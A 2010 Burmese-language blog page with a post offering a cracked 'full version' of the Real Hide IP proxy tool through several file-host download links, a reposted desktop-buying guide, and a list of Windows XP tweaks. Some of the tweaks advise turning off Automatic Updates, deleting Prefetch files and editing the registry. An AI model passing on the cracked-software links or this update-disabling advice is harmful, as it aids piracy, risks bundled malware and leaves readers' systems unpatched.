Tuesday 28 September 2010

Hide Your IP Address


Real Hide IP ဆိုတဲ့ ဆော့ဖ်ဝဲလ်လေးနဲ့ မိတ်ဆက်ပေးချင်ပါတယ်။ သူက မိမိတို့ သုံးနေတဲ့ IP ကို တစ်ခြားနိုင်ငံ IP အဖြစ်
ပြောင်းလဲပေးပါတယ်။ အဲအတွက် မိမိကိုယ် ဘယ်နိုင်ငံကမှန်း အမှန်မသိတော့ပါဘူး။
တနည်းအားဖြင့် proxy ကျော်တာပေါ့ဗျာ ။ ဘန်းထားတဲ့ဆိုက်တွေကို ဒီဆော့ဖ်ဝဲလ်လေး သုံးပြီး ကျော်ရင်လဲ ရပါတယ်။
ကျွန်တော်စမ်းကြည့်တာတော့ အဆင်ပြေပါတယ်။ သုံးနည်းကလဲ Hide IP ဆိုပြီး နှိပ်လိုက်ရင် ရပါပြီး ။

မိမိပြောင်းချင်တဲ့ IP ကို နိုင်ငံအလံတွေ နှိပ်ပြီး ပြောင်းချင်တဲ့ နိုင်ငံ IP ပြောင်းနိုင်ပါတယ်။
ဖူးဗားရှင်းပါ .. အထဲမှာ ကရက်ဖိုင်ပါပါတယ်။

http://ifile.it/um7hlc5
(or)
http://www.mediafire.com/?x3wqz53aj68syyi
(or)
http://dl.dropbox.com/u/9563152/RealHideIP-4.0.4.2.rar
(or)
http://www.fileden.com/files/2009/1/4/2252355/RealHideIP-4.0.4.2.rar

ရေးသားသူ ရာမညဖိုးလပြည့်

အပြည့်အစုံ

Desktop computer ၀ယ်တော့မယ်ဆိုရင်

Desktop computer ၀ယ်တော့မယ် ဆိုရင် ပထမဦးဆုံး စဉ်းစားသင့်တဲ့ အချက်က ဘယ်လို အမျိုးအစားကို ၀ယ်မှာ လည်း ဆိုတာပါ။ အရင်တုန်းက desktop ကွန်ပျူတာမှာ ရွေးခြယ် စရာ မရှိပေမဲ့ နောက်ပိုင်းမှာ desktop, nettop, compact, all in one စသဖြင့် အမျိုးမျိုးရှိလာခဲ့ပါတယ်။ Desktop ကတော့ နေရာ ကျယ်ကျယ် ပေးရတယ်၊ ဈေးနှုန်း သက်သာတယ်၊ power user တွေအတွက် အဆင်ပြေပြီး hardware ပစ္စည်းတွေ လိုအပ်ရင် အလွယ်တကူ တိုးချဲ့နိုင် စွမ်းရှိပါတယ်။

Nettop တွေက အများအားဖြင့် လက်ဖ၀ါးပေါ် တင်ထား နိုင်လောက်တဲ့ အရွယ်လောက် ရှိတဲ့အတွက် လူတွေ စိတ်ဝင်စား ကြတာ အမှန်ဖြစ်ပေမဲ့ သတိပြုရမှာက သူ့ရဲ့ hardware ပစ္စည်းတွေက အများအားဖြင့် laptop ရဲ့ ပစ္စည်းတွေကို အသုံးပြုထားတာ ဖြစ်တာကြောင့် desktop လို စွမ်းဆောင်ရည် မကောင်းပဲ hardware ပစ္စည်းတိုးချဲ့ ဖို့လည်း အခက်အခဲ ရှိပါတယ်။ compact PC တွေက nettop လောက် မသေးပေမဲ့ သူသည်လည်း အကန့်အသတ် နဲ့သာ upgrade လုပ်နိုင်ပါတယ်။ တကယ်လို့ သာမန် အဆင့် နဲ့ အင်တာနက် လောက်သာ အသုံးပြုချင်တယ် ဆိုရင်တော့ ရွေးခြယ်သင့် သလို All in one ကွန်ပျူတာတွေ ကလည်း ခေတ်စားလာ ခဲ့ပါတယ်။ ယေဘုယျ အားဖြင့် ကြည့်ရင်တော့ monitor ခပ်ထူထူ တစ်လုံး လိုဖြစ်နေသလို သူ့ရဲ့ အားနည်းချက်ကလည်း monitor နဲ့ တွဲထား ရတဲ့ အတွက် ကွန်ပျူတာကို လဲရင် monitor ကိုပါ တပါတည်း လဲပစ်ရတာပါ။
နောက်စဉ်းစား ရမဲ့ အချက်က processor ပါ။ ထုတ်လုပ်သူတွေက Intel, AMD စသဖြင့် အဓိက ၂ ခုရှိပြီး အမျိုးအစားထဲမှာတော့ Pentium , Core 2 Duo, Athlon, Sempron စသဖြင့် ရှိပါတယ်။ သာမန်အားဖြင့် Core နှစ် core ဆိုရင် multitasking အတွက် အကောင်းဆုံး လုပ်ဆောင်နိုပြီး၊ သုံး core လေး core ဆိုရင် လုပ်ဆောင်ချက် ပိုမို ကောင်းမွန် ပါတယ်။ clock speed ကလည်း စဉ်းစား စရာ တစ်ခုဖြစ်ပြီး သတိထားရမှာက အမြန်နှုန်းမှာ သူ့လိုင်းနဲ့ သူပဲ နှိုင်းယှဉ် နိုင်ပါတယ်။ ဥပမာ အားဖြင့် 2.0 GHz Intel Atom Processor က 1.8 GHz Intel Atom Processor ထက် ပိုမြန်ပေမဲ့ 1.8 GHz Intel Core 2 Duo ထက် ပိုမြန်မှာ မဟုတ်ပါဘူး။
နောက်တစ်ချက်က memory ပါ။ memory များလေ ကွန်ပျူတာ ရဲ့ စွမ်းဆောင်ရည် ကောင်းလေ ဆိုတာ သိသာတဲ့ အချက် ဖြစ်သလို ထပ်ထွက် လာမဲ့ software တွေကို လိုက်မှီဖို့ ကိုယ်ဝယ်ယူမဲ့ mother board မှာ memory slot အပို ရှိသေး ရဲ့လား ဆိုတာ လေ့လာ ပြီးမှ ၀ယ်သင့်ပါတယ်။ memory အနေနဲ့ Windows Vista တင်ထားရင် အနည်းဆုံး 1 GB လောက်ရှိသင့်ပြီး Windows 7 ဆိုရင် ဒီထက်ပိုရှိတာက ကောင်းပါတယ်။ Windows နဲ့ ကွန်ပျူတာ လည်ပတ်ဖို့ လိုအပ်တဲ့ ဆော့ဖ်ဝဲတွေ ကပဲ 512 MB လောက် လိုအပ်နေတာကြောင့် အနည်းဆုံးတော့ 1 GB လောက် ရှိသင့်ပါတယ်။
Video card အနေနဲ့ကတော့ desktop ကွန်ပျူတာတွေအတွက် ရွေးခြယ်စရာ အများကြီး ရှိပါတယ်။ များသောအား ဖြင့် ဈေးနှုန်း ကိုလိုက်ပြီး ကိုယ်ကြိုက်နှစ်သက်ရာ ကို အလွယ်တကူ ရွေးခြယ် နိုင်ပါတယ်။ ဂရပ်ဖစ်ကို အသားပေး သုံးမယ်၊ ဖန်တီးမယ် ဆိုရင်တော့ video card ကောင်းကောင်း လိုအပ်မှာဖြစ်ပြီး သာမန်အားဖြင့် ဆိုရင်တော့ mother board မှာ ပါပြီးသားဖြစ်တဲ့ built-in video card တွေက လုံလောက်ပါတယ်။ ဒါပေမဲ့ လိုအပ်ရင် တိုးချဲ့ နိုင်ဖို့ video card slot ပါတဲ့ mother board ကိုဝယ်ထားရင်တော့ ပိုပြီး စိတ်ချရနိုင်ပါတယ်။
နောက်တစ်ခုက Hard disk ပါ။ 200 GB, 500 GB စသဖြင့် ဈေးနှုန်းပေါပေါ တွေနဲ့ အများကြီး ထွက်ပေါ်နေတဲ့ ကြားမှာ တော့ ဈေးနှုန်း မြင့်မြင့်နဲ့ တံဆိပ် ကောင်းကောင်း အမျိုးအစား ကို ရွေးခြယ်စေချင်ပါတယ်။ အဖိုးတန် data တွေကို သိမ်းထား ရမှာ ဖြစ်တာကြောင့် ဖြစ်နိုင်ရင် Hard disk ၂ လုံးလောက် ထားပြီး တစ်လုံးကို backup အနေနဲ့ ထားရင် ပိုသင့်လျော်နိုင်ပါတယ်။ Hard disk က မြန်မြန်လည်ပတ်နိုင်လေ ကွန်ပျူတာရဲ့ စွမ်းဆောင်ရည် မြင့်လေ ဆို တဲ့အတိုင်း လည်ပတ်နှုန်းတွေက 5400 RPM ကနေ 10000 RPM အထိ ရှိကြပါတယ်။ 7200 RPM ဆိုရင်တော့ အသင့် တော်ဆုံးပါ။
နောက်ဆုံး အချက်ကတော့ monitor ပါ။ monitor တွေမှာ အခုနောက်ပိုင်း LCD တွေပဲ နေရာယူ လာတာနဲ့ အမျှ ရွေးခြယ် စရာတွေကလည်း များပြားလှပါတယ်။ အဓိက ကတော့ refresh rate ပါ။ refresh rate များရင် လှုပ်ရှားမှု များတဲ့ game လို၊ ရုပ်ရှင်လို အရာတွေကို အထစ်အငေါ့ မရှိ ပြသ ပေးနိုင်ပါတယ်။ ၅ မီလီ စက္ကန့် respond time လောက် ဆို လုံလောက်ပါတယ်။ refresh rate က မီလီစက္ကန့်နဲ့ တိုင်းတာပြီး နည်းလေ ကောင်းလေပါ။ မော်နီတာ ကြီးကြီး ၀ယ်ရင် ကောင်းပေမဲ့ သူ့ရဲ့ recommended resolution က ကိုယ့်စက် ရဲ့ video card နဲ့ ချိန်ညှိ နိုင်၊ မနိုင် ကိုလည်း စုံစမ်းပြီးမှ ၀ယ်သင့်ပါတယ်။ အဲလိုမှ မဟုတ်ရင် မော်နီတာကြီးက ကောင်းပေမဲ့ ရုပ်ပုံတွေ ဖွာနေတာ၊ ဘေးဖက် ကို ကားနေ တာစတဲ့ ပြသနာတွေ ကြုံတွေ့ရနိုင်ပါတယ်။
  
တူလေး ရေးသားသည်။ http://www.tu-lay.net မှ ကူးယူဖော်ပြသည်။

အပြည့်အစုံ

Sunday 26 September 2010

Window XP ရဲ့ ရိုးရှင်းသော လျှို့ဝှက်ချက် (၄၀)

(၁) Start Menu ကို ပိုမိုမြန်ဆန်စေဖို့ Start ကိုနှိပ်ပါ။ Run box ကိုဖွင့်ပါ။ Regedit လို့ရိုက်ပါ။ (Registry editor ကိုဆိုလိုတာပါ။) ဘယ်ဘက် panel မှာ “HEYCURRENT USER” ကို ကလစ်နှိပ်ပါ။ အဲဒီထဲ ကမှ “control panel” ကို ထပ်ရွေးပါ။ “Control panel” ထဲကမှ Desktop ကို ရွေးပါ။ ညာဘက်အကွက်မှာ ပေါ်လာတဲ့ “Menushowdelay” ကို Right click နှိပ်ပါ။ Modify ကိုရွေးပြီး Value ကို “0″ ထားပါ။ ပြီးပြီဆိုတာနဲ့ Restart ပြန်လုပ်ပါ။

(၂) မလိုအပ်တဲ့ ဖိုင်တွေကို ရှင်းပစ်ရင် ပိုမြန်ဆန် စေပါတယ်။
- Start ကိုသွားပါ။
- Run box ကိုဖွင့်ပါ။
- “gpedit.msc” ဆိုပြီး ရိုက်ပါ။
- ဘယ်ဘက် panel မှာ “computer configuration” ရွေးပါ။
- “Administrative Templates” ကိုရွေပါ။
- “Windows components” ကို ရွေးချယ်ပါ။
- “Terminal services” ကိုရွေးချယ်ပါ။
- ညာဘက် panel မှာ ပေါ်လာမှာဖြစ်တဲ့ “Do not delete Temp Folder Upon exit” မှာ Right click နှိပ်ပါ။
- Properties ကို ရွေးချယ်ပါ။
- ပြီးရင် “disable” ကို ရွေးချယ်ပါ။

(၃) မလိုအပ်တဲ့ ဖိုင်တွေကို ရှင်းပစ်ရင် ပိုမို မြန်ဆန် စေပါတယ်။
နောက်တစ်မျိုး ရှင်းနည်း ရှိပါသေးတယ်။
- Start ကို ကလစ်နှိပ်ပါ။
- Run box ကိုဖွင့်ပါ်။
- “% temp%” လို့ ရိုက်ထည့်ပါ။
- အဲဒီမှာ တွေ့သမျှ ဖိုင်တွေကို ‘Ctrl+A’ နဲ့ Select ပေးပြီး ဖျက်ထုတ်ပစ်ပါ။ (အချို့  လုပ်ဆောင်နေဆဲ
ဖိုင်တွေကိုတော့ ဖျက်လို့မရတဲ့ အကြောင်း ပြောလာတတ်ပါတယ်။)

(၄) မလိုအပ်တဲ့ ဖိုင်တွေကို ရှင်းပစ်ရင် ပိုမို မြန်ဆန် စေပါတယ်။
နောက်တစ်မျိုး ရှင်းနည်း ရှိပါသေးတယ်။
- Start > Run box ကိုဖွင့်ပါ။
- “Prefetch” လို့ ရိုက်ထည့်ပါ။
- တွေ့သမျှ ဖိုင်မှန်သမျှ ဖျက်ပစ်ပါ။

(၅) Hard disk ကို အချိန်ရှိသရွေ့  ရှင်းလင်းပေးပါ။
- All Program ကိုသွားပါ။
- Accessories ကနေတစ်ဆင့် “System tools” အောက်မှာ ရှိနေတဲ့ “Disk Clean Up” ကို ကလစ်နှိပ်ပါ။ ၅
မိနှစ်အ တွင်းမှာ ပုန်းကွယ်နေတဲ့ အ မှိုက်သရိုက်တွေ မှန်သမျှကို ရှင်းလင်းပေးပါလိမ့်မယ်။ (ကိုယ်အ နေနဲ့
အပြင်ကို ခဏတဖြုတ် သွားမယ့် အ ချိန်မျိုးတွေမှာ သိပ်အ သုံးဝင်ပါတယ်။)

(၆) မသုံးတဲ့ ပရိုဂရမ်တွေကို ဖယ်ထုတ်ပါ။
- Start > Run
- “msconfig” လို့ရိုက်ပါ။
- “System configuration Utility” box ပေါ်လာပါမယ်။
- ညာဘက် အ စွန်းဆုံးမှာ “Start up tab” ဆိုတာ ရှိပါတယ်။
- ကိုယ့်အ တွက် အသုံးမ၀င်တဲ့ program တွေရဲ့  ရှေ့  မှာ အ မှန်ခြစ် အ မှတ် အ သား လုပ်ထားခဲ့ရင် ပြန်ပြီး
“uncheck” လုပ်ပေးပါ။
- Restart နဲ့ ပြန်စပါ။

(၇) လုံခြုံစေဖို့ ဖိုင်စနှစ် ပြောင်းသုံးပါ။
- Start > all programs > accessories > command prompt တစ်ခုချင်း ကလစ်နှိပ်ပြီး သွားပါ။
- Command pormpt ပေါ်လာရင် အနက် screen ကြီးကို တွေ့ရပါမယ်။
- မှိတ်တုတ်မှိတ်တုတ် cursor လေးနဲ့ “convert c:fs:ntfs” လို့ရိုက်ပါ။
- ပြီးရင် ‘Enter’ ခေါက်ပါ။
- Command prompt ကို နောက် တစ်မျိုး “Start > Run” မှာ cmd လို့ ရိုက်ထည့်ပြီး သွားနိုင်ပါတယ်။
- တကယ်လို့ NTFS ပြောင်းပြီးသား ဆိုရင် ပြောင်းဖို့ မလိုပါ။ My computer ကို Right Click နှိပ်ပြီး
“properties” မှာဖွင့်ကြည့် နိုင်ပါတယ်။
- cmd ထဲဝင်ပြီး ပြန်ထွက်မရ ဖြစ်နေရင် “exit” လို့ရိုက်ပြီး ထွက်ပါ။

(၈) Memory ပိုမို အလုပ်လုပ်စေနိုင်ဖို့
- XP ရဲ့ default မှာ memory ရေရှည် အသုံးခံနိုင်အောင်နဲ့ တခြား လိုအပ်တဲ့ စနစ်ပိုင်း ဆိုင်ရာတွေကို မောင်းနှင်ဖို့ စီမံထားပါတယ်။ ဒါပေမယ့် တစ်ခါတလေမှာ ကိုယ့်အတွက် အသုံးမ၀င်ပါဘူး။ ရှိရင်းစွဲ memory
ကိုပဲ လှည့်ကွက်တစ်ခု အနေနဲ့ ပိုပြီး ကောင်းမွန်အောင် သုံးစွဲနိုင်ပါတယ်။
- Start > Run > Regedit အဆင့်ဆင့်သွားပါ။
- Registry panel ရဲ့ ဘယ်ဘက်မှာ “HKEYLOCALMACHINE” ကို click နှိပ်ပါ။
- “System” ကို ကလစ် နှိပ်ပါ။
- “Current control set” ကို ကလစ် နှိပ်ပါ။
- “control” ကို ကလစ်နှိပ်ပါ။
- “Session Manager” ကို နှိပ်ပါ။
- “Memory Managment” ကိုကလစ်နှိပ်ပါ။ ညာဘက် panel မှာ ရှိတဲ့ “Disable pasing executive” ကို
Double Click နဲ့ ဖွင့်ပါ။
- Large System Cache ကိုလည်း double click နဲ့ ဖွင့်ပါ။
- Decimal value ကို “1″ ပြောင်းပေးပါ။
- Restart ပြန်လုပ်ပါ။ Memory Performance ပိုပြီး ကောင်းမွန်လာပါလိမ့်မယ်။

(၉) ဖိုင်တွေကိုလုံခြုံစေဖို့ password ပေးပါ။
ကိုယ့်ရဲ့ဖိုင်တွေ၊ folder တွေ၊ ebook စတာတွေကို လုံခြုံစေဖို့ နည်းလမ်းအ မြောက်အ မြား ရှိပါတယ်။
password ပေးပြီး သိမ်းဆည်းထားတာဟာ အ လုံအခြုံဆုံးပါပဲ။ အဲဒီလို password ပေးတဲ့အ ခါမှာ
သိမ်းဆည်းချင်တဲ့ ဖိုင်တွေကို folder တစ်ခုထဲကို အ ရင်ထည့်ပါ။ ပြီးရင်ကိုယ်မှတ်မိတဲ့ Name ပြောင်းပါ။ ပြီးရင်
Windows ရဲ့ built-in zip format ကို password ပေးပါ။
- Zip Software ကို install လုပ်ပြီး သုံးစွဲတာက ပိုကောင်းပါတယ်။
- Win Zip Software ကို ဖွင့်ပါ။
- File menu အောက်မှာရှိတဲ့ Add a password ကို ကလစ်နှိပ်ပါ။
Winrar Software ကို install လုပ် ခဲ့မယ်ဆိုရင်တော့
- ဖိုင်ကိုကလစ်ထောက်လိုက်ပြီး ချုံ့ပေးပါ…လို့ ခိုင်းပါ။
- Advanced မှာ “Set password” ကို click နှိပ်ပါ။
- Password line နှစ်ကြောင်း တွေ့ရပါလိမ့်မယ်။ တစ်ခုနဲ့တစ်ခု တူညီရပါမယ်။

(၁၀) ဖိုင်တွေ လုံခြုံစေဖို့ ရုပ်ဖျက်ထားနိုင်ပါတယ်။
ဆော့ဖ်ဝဲအသုံးပြုထားတဲ့ ဖိုင်မှန်သမျှဟာ အဲဒီဆော့ဖ်ဝဲရဲ့ extension နဲ့ အဆုံးသတ်ပါတယ်။ ဥပမာ ebook
စာအုပ်တွေဆိုရင် (.pdf)၊ စာစီစာရိုက် ဆော့ဖဲဝဲ pagemaker ဆိုရင် (.pmd)၊ Photoshop ဆိုရင် (.psd)
(.jpg) စတဲ့ အဆုံးသတ် extension တွေပါဝင်ပါတယ်။ အဲဒီ extension တွေကို ဖော်ထားလို့ ရသလို
ဖျောက်ထားလို့လည်းရပါတယ်။
- ပထမဆုံး My Computer ကိုကလစ်နှိပ်ပြီး အထဲကို ၀င်ပါ။
- Folder options ကို သွားပါ။ (Tools အောက်မှာ ရှိပါတယ်။)
အဲဒီက “File Types” ကို ကလစ် နှိပ်ပါ။ (အဲဒီအခါမှာ ဖိုင်ရဲ့ extension တွေ တစ်ခုချင်းစီအလိုက်
ပေါ်လာပါလိမ့်မယ်။
- အခု ဖုံးကွယ်ထားမယ့် ဖိုင်တစ်ခုကို extension ပြောင်းပေးပါ။ ဥပမာကိုယ်က (.pmd)နဲ့ စာရိုက်ထားတဲ့ page
တစ်ခုကို ဖျောက်ထားချင်ရင် အဲဒီ (.pmd) နေရာမှာ (.pdf) စသည်ဖြင့် ပြောင်းလဲပေးလိုက်ပါ။
- ပြီးရင် extension ဖော်ထုတ်ထားတာကို ပြန်ပြီး ဖျောက်ပစ်လိုက်ပါ။
- အဒီအခါမှာ ကိုယ့်ဖိုင်ဟာ ကိုယ်ကိုယ်တိုင်တောင်မှ မမှတ်မိ နိုင်တော့တဲ့ ဖိုင်အမျိုးအစား တစ်ခုအနေနဲ့
ပြောင်းလဲသွားပါလိမ့်မယ်။

(၁၁) ပရိုဂရမ်ရဲ့ အမြန်နှုန်းတွေကို မြှင့်တင်ပါ။
Screen ရဲ့ အောက်ခြေမှာရှိတဲ့ ‘taskbar’ ကို Right click လုပ်ပါ။
- ပေါ်လာတဲ့ box ထဲက ‘Task Manager’ ရွေးပါ။
- ‘Task Manager’ ထဲကမှ ‘process tab’ ကို ရွေးချယ်ပါ။ ကိုယ့် ပီစီထဲမှာ ရှိတဲ့ ပရိုဂရမ်တွေ၊ browser တွေ
ပေါ်ထွက် လာပါလိမ့်မယ်။
- ကိုယ် မကြာခဏ သုံးစွဲလေ့ရှိတဲ့ ပရိုဂရမ်ပေါ်မှာ “Right Click” နှိပ်ပါ။
- ‘pirority’ ကို High လုပ်လိုက်ပါ။
- ကိုယ်သုံးစွဲတဲ့ ပရိုဂရမ်ဟာ သိသိသာသာ အမြန်နှုန်း မြင့်တက်လာပါလိမ့်မယ်။

(၁၂) Hibernate မလုပ်ပါနဲ့။
Hibernate ကို ကွန်ပျူတာ သမားတွေ အသိများပါတယ်။ နောက်တစ်နေ့မှာ ကိုယ်သုံးစွဲထားခဲ့တဲ့
ပရိုဂရမ်တွေအတိုင်း ပြန်ပေါ်ထွက်လာအောင် စီစဉ်ပေးထားတာပါ။ ဒါပေမယ့် memory ကို အရမ်းစားပြီး hard
disk မှာလည်း မတရား နေရာယူလွန်းပါတယ်။
- Control Panel ကိုဖွင့်ပါ။
- Power Options ကို click နှိပ်ပါ။
- Hibernate ကို ရွေးချယ်ပါ။
- ‘Enable hibernation’ ကို ‘Uncheek’ ပြန်လုပ်ပါ။ (ခွင့်မပြုဘူး ဆိုတဲ့ သဘောပါ။)

(၁၃) Memory နည်းပါးနေတဲ့ အခါ
အမြဲလို ကြုံရဘူးပါတယ်။ ဆော့ဖ်ဝဲ နှစ်ခုလောက်ပြိုင်အလုပ်လုပ်တဲ့အခါ ‘Memory Inerupt’ ဆိုပြီး
ဆော့ဖ်ဝဲ တစ်ကို ပိတ်သွားတာမျိုး ရှိသူတွေအတွက် လျှော့ချသင့်တဲ့ ပုံစံတွေ ရှိပါတယ်။ XP မှာ
အသစ်ပေါင်းထည့်ထားတဲ့ feature အသစ်ဟာ momery ကို အလွန်သုံးစဲသွ လို “Thames” တွေကလည်း
memory ကို သုံးစွဲပါတယ်။ ဒါကြောင့် Style XP လို “Thames” တွေကို memory မြင့်မြင့်မားမား မရှိဘဲနဲ့
install မလုပ်ပါနဲ့။ Window ရဲ့ ဂန္တ၀င် ပုံစံဟာ memory ကို ချွေတာရာရောက်ပြီး အလုပ် များများရှိတဲ့
လူတွေအဖို့ သင့်တော်ပါတယ်။
- Control Panel > System
- Advanced tab ရွေးချယ်ပါ။
- ‘Performance’ မှာ ’setting’ ဆိုတာ ပါဝင်ပါတယ်။ အဲဒီ setting ကို ကလစ်နှိပ်ပြီး ‘Adjust for best
performance’ ကို ရွေးချယ်ပါ။
နောက်တစ်နည်းနဲ့ Start Menu ကို ဂန္တ၀င် ပုံစံပြောင်းလို့ ရသေးပေမယ့် အ ခုနည်းက OS ကနေ
အ လိုအ လျှေက် ညှိနှိုင်း ဆောင်ရွက်ပေးတဲ့ အ တွက် ကောင်းပါတယ်။

(၁၄) Automatic update ကို ပိတ်သင့်ပါသလား။
အ င်တာနက် ချိတ်ဆက်ထားတဲ့ ပီစီတွေ အ ဖို့တော့ Automatic update ကို ပိတ်ထားတာဟာ အ ဆိုးရော
အ ကောင်းရော ဖြစ်စေပါတယ်။ အ ဆိုးကတော့ browser မှာ ထည့်သွင်းထားတဲ့ ‘add-ons’ လို update တေ
ွမရနိုင် တော့ပါ။ အ ကောင်းဘက် ကတော့ memory ကို ပိုမို များပြားစွာ သုံးစွဲစေပြီး XP ကို ပိုမြန်စေပါတယ်။
- Control Panel > System
- Automatic updating ကို Turn Off လုပ်ပေးပါ။

(၁၅) ပရိုဂရမ်တွေကို Shortcuts တွေ တည်ဆောက်ထားပါ။
- Desktop မှာ New Floder ဖန်တီးပြီး ‘Application’ လို့ အမည်ပေးပါ။
- ပြီးရင် ပရိုဂရမ် တွေရဲ့ Shortcuts တွေ မှန်သမျှ ထည့်ပေးပါ။
- Taskbar မှာ Right Click နှိပ်ပြီး toolbar မှာ ‘New toolbar’ ကို သွားပါ။
- အခုန တည်ဆောက်ထားတဲ့ ‘Application’(New Floder)’ ဆီကို ညွှန်းပေးပါ။
- ပီစီဖွင့်တိုင်းမှာ Shortcuts တွေကနေ တစ်ဆင့် အမြန်ဆုံး အလုပ်လုပ်နိုင်ပါမယ်။

(၁၆) ‘Shut-down’ shortcut ဖန်တီးနိုင်ပါတယ်။
- Desktop မှာ Right Click နှိပ်ပါ။ New shotcut ကို ဖန်တီးပါ။
- နာမည်မှာ ’shutdown-s-to’ လို့ အမည်ပေးပါ။
- ပြီးရင် properties ကို သွားပါ။ Target နေရာမှာ “C:/Windows/system32/shutdown.exe”ကို ရွေးပေးပါ။
(XP.SP2 သမားတွေအတွက်တော့ အလွယ်တကူနဲ့ C > Windows > System32 > “shutdown icon” အထိ
သွားပြီး shutcut ဖန်တီးနိုင်ပါတယ်။)

(၁၇) Keyboard shotcut တွေကိုသုံးပါ။
Ctrl+A ဆိုတာ Select All ၊ Ctrl+C ဆိုတာ Copy ၊ Ctrl+V ဆိုတာ Pasteဒီလိုမျိုး မြန်ဆန်စေတဲ့
ကီးဘုတ်ဖြတ်လမ်း နည်းလေးတွေကို သုံးစွဲကြည့် နိုင်ပါတယ်။

(၁၈) Fonts တွေကို ခဏ ဖယ်ထုတ်ထားပါ။
ဖြစ်နိုင်ရင်တော့ တချို့  Fonts တွေဟာ ဥပမာအားဖြင့် ကိုယ်ဟာ စာစီစာရိုက် သမားတစ်ယောက်၊ Web
designer တစ်ယောက်မဟုတ်ရင် မလိုအပ်တဲ့ font တွေကို အပြီးတိုင် ဖယ်ထုတ်ထားလို့ ရပါတယ်။
Photoshop လို ပရိုဂရမ်မျိုးဟာ ဖွင့်ချိန် အရမ်းကြာမြင့်တာဟာ သူ့ရဲ့ library ထဲကို အသင့်သုံးပစ္စည်းတွေကို
ခေါ်ယူနေတာကြောင့်ပါ။ အဲဒီ လိုမျိုးပဲ တခြားပရိုဂရမ်ေ်တွဟာ ကြာနေတတ်တာဟာလည်း အကြောင်းအမျိုးမျိုး ရှိနိုင်ပြီင်္း အဒီထဲက အကြောင်းတစ်ခုက ‘Fonts’ တွေကို loading လုပ်နေရလို့ပဲ ဖြစ်ပါတယ်။
- Control Panel > Fonts ကို ဖွင့်ပါ။
- Folder အသစ်တစ်ခု ဆောက်ပါ။ အသုံးမလိုတဲ့ Fonts တွေကို သီးသန့် ပေါင်း စုထားပြီး၊ control panel
ကနေ ခွဲထုတ်နေရာ ရွှေ့  ပစ်လိုက်ပါ။
- ဒါဟာ ပရိုဂရမ်တွေကို မြန်ဆန်စေတဲ့ လျှို့ ဝှက်ချက် တစ်ခုပါပဲ။

(၁၉) Font အရွယ်အစား ပြောင်းလဲ ကြည့်နိုင်ရန်
အင်တာနက် သုံးစွဲ နေတဲ့ အချိန်မှုာ Image ပေါ်မှာ ရေးထားတဲ့ စာလုံးတွေကိုပဲ ဖြစ်ဖြစ် တခြားနေရာ မျိုးစုံက
အက္ခရာတွေကိုပဲ ဖြစ်ဖြစ် ပိုမိုသဲကွဲစွာ မြင်နိုင်ဖို့ နည်းရှိပါတယ်။
- Ctrl ကို ဖိထားရင်း keyboard အပေါ်တန်းက “+” ကို နှိပ်ပါ။ နှိပ်လေလေ font နဲ့ webpage စာမျက်နှာ
ကြီးလာလေလေ ဖြစ်ပါလိမ့်မယ်။ အရွယ်အစား လျှော့ချဖို့ ကတော့ ‘Ctrl’ နဲ့ အနှုတ်လက္ခဏာကို
တွဲဖက်အသုံးပြုပါ။

(၂၀) Shift + Delete ကို သတိထားပါ။
ရိုးရိုး Delete ဟာ ဖိုင်တစ်ခုကို ဖျက်ပစ်လိုက်ပေမယ့် အမှိုက်ပုံးထဲမှာ ကိုယ်စားကျန်ပါသေးတယ်။ Shift Key
ကို သတိထားပြီး Delete ခလုတ်ကို နှိပ်ချလိုက်မယ် ဆိုရင်တော့ အပြီးတိုင် ဖျက်ပေးသွားပါလိမ့်မယ်။ မလိုလား
အပ်တဲ့ အကျိုးဆက်တွေ ဖြစ်စေနိုင်တာမို့ ‘Shift + Del’ ကို သတိထားပြီး သုံးစွဲပါ။

(၂၁) Error report ကို ပယ်ဖျက်ပါ။
ပရိုဂရမ်တွေ မျိုးစုံ ဖွင့်နေရင်း တစ်ခါတစ်လေမှာ ပရိုဂရမ် တစ်ခုခုဟာ ကြာမြင့်နေတဲ့ အချိန်မှာ hang
မသွားခင်မှာ windows ရဲ့ ‘Error report’ box တက်လာတတ်ပါတယ်။ အဲဒါကို ဖျောက်ထားပစ်ပါ။
- Control Panel > System
- ပြီးရင် Advanced ကို click နှိပ်ပါ။Aဲဒီထဲကမှ ‘Error Reporting’ Disable ကို ကလစ်နှိပ်ပြီး OK နဲ့ ထွက်ပါ။

(၂၂) ‘Open-with’ ဆိုတာ
ဗီဒီယိုဖိုင်တွေ အတွက်ဆိုရင် ‘Open-with’ ဟာ အ လွန်အ သုံးဝင်ပါတယ်။ window media player ကို
လက်မခံတဲ့ file extension တွေကို open-with နဲ့ ဖွင့်လှစ်ရပါမယ်။ (အ ရင်ဆုံး player တချို့ ကိုတော့ install
လုပ်ဖို့ လိုပါလိမ့်မယ်။)
- ဖွင့်ချင်တဲ့ ဖိုင်တစ်ခုကို ‘Right Click’ ထောက်ပြီး ‘open with’ ကို ရွေးချယ်ပါ။
- ‘Browser’ လုပ်လိုက်ရင် ပရိုဂရမ်တွေ အစီအ ရီ ပေါ်ထွက်လာပါလိမ့်မယ်။ စိတ်ကြိုက်တစ်ခုကို ရွေးချယ်ပြီး
ဖွင့်လှစ် နိုင်ပါတယ်။ ဘယ်လိုမျှ ဖွင့်ကြည့်လို့ မရဘူးထင်တဲ့ Note pad ပုံစံ ပရိုဂရမ်တွေကို word pad နဲ့
ဖွင့်လို့ ရပါတယ်။

(၂၃) Open-with ဟာ ပိုပြီး မြန်ဆန်ပါတယ်။
Photoshop မှာ (.psd) ဆိုတဲ့ ပရိုဂရမ်ပိုင် extension တွေက လွှဲလို့ တခြားပုံရိပ်တွေကို ဖွင့်ကြည့်ချင်ရင်
‘open-with’ က ပိုပြီးမြန်ဆန်ပါတယ်။ Open-with ကနေ ‘Image Viewer’ ကို ရွေးချယ်ပေးပါ။

(၂၄) Filmstrip နဲ့ ရုပ်ရှင် ကြည့်နိုင်ပါတယ်။
ကိုယ့်မှာရှိတဲ့ ပုံရိပ်တွေ အားလုံးကို floder ထဲမှာ တစ်စု တစ်စည်းတည်း ထားလိုက်ပါ။ ဓါတ်ပုံတွေ အားလုံးကို
ရုပ်ရှင် တစ်ခုကို ကြည့်နေရသလိုမျိုး စ်ီထားနိုင်ပါတယ်။
- Floder ကို ဖွင့်လိုက်ပါ။
- ပြီးရင် Menu bar ထဲက ‘View’ မှာ Filmstrip ကို ရွေးချယ်လိုက်ပါ။
- Ctrl Key ကို ကိုင်ထားပြီး လိုအပ်သလို အကွက်ရွှေ့ လို့ ရပါတယ်။

(၂၅) IE ရဲ့ homepage ကို Blank လုပ်ထားပါ။
